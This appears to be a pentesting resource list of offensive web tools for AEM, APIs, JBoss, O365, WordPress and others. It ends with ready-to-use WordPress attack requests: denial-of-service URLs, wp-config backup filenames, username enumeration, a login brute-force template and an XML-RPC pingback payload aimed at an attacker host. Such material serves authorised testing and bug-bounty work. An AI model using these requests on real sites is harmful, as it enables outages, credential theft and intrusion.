Web Technologies
Adobe AEM
aem-hacker - Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
aemscan - Adobe Experience Manager Vulnerability Scanner
Apache Web Server
apache-users - This Perl script will enumerate the usernames on any system that uses Apache with the UserDir modul
APIs
https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d - API Endpoint wordlist
imperva/automatic-api-attack-tool - Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output.
Astra - Automated Security Testing For REST API's
OWASP API check - APICheck is an environment for integrating existing HTTP APIs tools and create execution chains easily.
VX-API - Collection of various WINAPI tricks / features used or abused by Malware
https://malapi.io/ - Cheatsheet for commands that could be potentially used for malicious activity.
crAPI - completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.
https://github.com/Net-hunter121/API-Wordlist - A wordlist of API names used for fuzzing web application APIs.
https://github.com/metlo-labs/metlo - Metlo is an open-source API security platform
Hacking: The next generation - Application Protocol Handlers, pg. 96
For training on APIs and API hacking, please see https://github.com/jassics/security-study-plan/blob/main/api-security-study-plan.md
API: GraphQL
InQL - A Burp Extension for GraphQL Security Testing
ASP.NET
viewgen - a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
Cloudflare
cloudflare_enum - Cloudflare DNS Enumeration Tool for Pentesters
Firebase
Insecure-Firebase-Exploit - A simple Python Exploit to Write Data to Insecure/vulnerable firebase databases! Commonly found inside Mobile Apps. If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase db.
Firebase-Extractor - A tool written in python for scraping firebase data
Pyrebase - A simple python wrapper for the Firebase API.
Flask
Flask-Unsign - Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
Google Web Toolkit
GWTMap - GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications.
.htaccess File
htshells - htshells is a series of web based attacks based around the .htaccess files. Most of the attacks are centered around two attack categories. Remote code/ command execution and information disclosure.
JavaScript
JSScanner - Scan JS Files for Endpoints and Secrets
JSFScan.sh - Automation for javascript recon in bug bounty.
jshole - A JavaScript components vulnerability scanner, based on RetireJS
Retire.JS - Burp/ZAP/Maven extension that integrate Retire.js repository to find vulnerable Javascript libraries.
JSshell - JavaScript reverse/remote shell from XSS
unmap - Unpack a JavaScript Source Map back into filesystem structure
JSA - Javascript security analysis (JSA) is a program for javascript analysis during web application security assessment.
JBoss
jboss-autopwn - This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
jexboss - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
Jenkins
pwn_jenkins - Notes about attacking Jenkins servers
Accenture/jenkins-attack-framework - Project fpr enumerating and attacking Jenkins
Jira
jira_scan - A simple remote scanner for Atlassian Jira
Joomla
JCS - JCS (Joomla Component Scanner) made for penetration testing purpose on Joomla CMS
Joomscan - OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.
juumla - Juumla is a python tool created to identify Joomla version, scan for vulnerabilities and search for config files.
Megento
magescan - Scan a Magento site for information
NGINX
nginxpwner - Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.
OneLogin - SAML
SAMLExtractor - A tool that can take a URL or list of URL and prints back SAML consume URL.ex
OWA/O365
MailSniper - MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.
byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
o365enum - Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover v1, or office.com login page.
o365-attack-toolkit - o365-attack-toolkit allows operators to perform oauth phishing attacks.
http://www.blackhillsinfosec.com/?p=4694 - UserName Recon/Password Spraying
http://www.blackhillsinfosec.com/?p=5089 - Password Spraying MFA/2FA
http://www.blackhillsinfosec.com/?p=5330 - Password Spraying/GlobalAddressList
http://www.blackhillsinfosec.com/?p=5396 - Outlook 2FA Bypass
https://silentbreaksecurity.com/malicious-outlook-rules/ - Malicious Outlook Rules
http://www.blackhillsinfosec.com/?p=5465 - Outlook Rules in Action
Ruby on Rails
brakeman - A static analysis security vulnerability scanner for Ruby on Rails applications
SAP
SAP_RECON - PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
Virtual Hosts
virtual-host-discovery - A script to enumerate virtual hosts on a server.
vhosts-sieve - Searching for virtual hosts among non-resolvable domains
VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.ex
Web Proxies
https://github.com/GrrrDog/weird_proxies - Reverse proxies cheatsheet
Wordpress - Resources
WPScan - The Wordpress Vulnerability Scanner
https://wpsec.com/ - Online Wordpress scanner
Wordpress Exploit Framework - A Ruby framework designed to aid in the penetration testing of WordPress systems.
WPSploit - This repository is designed for creating and/or porting of specific exploits for WordPress using metasploit as exploitation tool.
xmlrpc-scan - Scan urls or a single URL against XMLRPC wordpress issues.
wpxploit - Simple Python Script For Performing XMLRPC Dictionary Attack
plecost - Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems.
WordPress Common Bugs
Denial of Service via load-scripts.php
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
Denial of Service via load-styles.php
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
Log files exposed
http://target.com/wp-content/debug.log
Backup file wp-config exposed
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
wp-config.html
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html
wp-config.php~
Information disclosure wordpress username
http://target.com/?author=1
http://target.com/wp-json/wp/v2/users
http://target.com/?rest_route=/wp/v2/users
Bruteforce in wp-login.php
POST /wp-login.php HTTP/1.1
Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
XSPA in wordpress
POST /xmlrpc.php HTTP/1.1
Host: target.com
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com></string>
</value>
</param></params>
</methodCall>
Source: https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md
Last updated